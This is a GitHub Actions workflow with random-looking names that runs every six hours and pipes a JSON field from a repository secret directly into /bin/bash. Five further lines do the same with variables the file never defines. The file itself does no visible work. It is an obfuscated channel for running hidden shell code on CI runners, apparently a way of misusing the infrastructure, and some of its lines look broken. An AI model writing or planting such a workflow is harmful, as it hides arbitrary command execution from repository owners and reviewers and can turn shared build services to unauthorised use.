name: examineexact
on:
  workflow_dispatch:
  schedule:
    - cron: '33 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: examineexact
        env:
          larij04253: ${{ secrets.larij04253 }}
        run: |
          echo $larij04253 | jq -r .qwxg78 | /bin/bash
          echo $ym0137 | jq -r .yuav0 | /bin/bash
          echo $wgkp701 | jq -r .jrvl205 | /bin/bash
          echo $rxcf184 | jq -r .hr71 | /bin/bash
          echo $a21 | jq -r .vpg65557 | /bin/bash
          echo $rwbtn50 | jq -r .er0 | /bin/bash

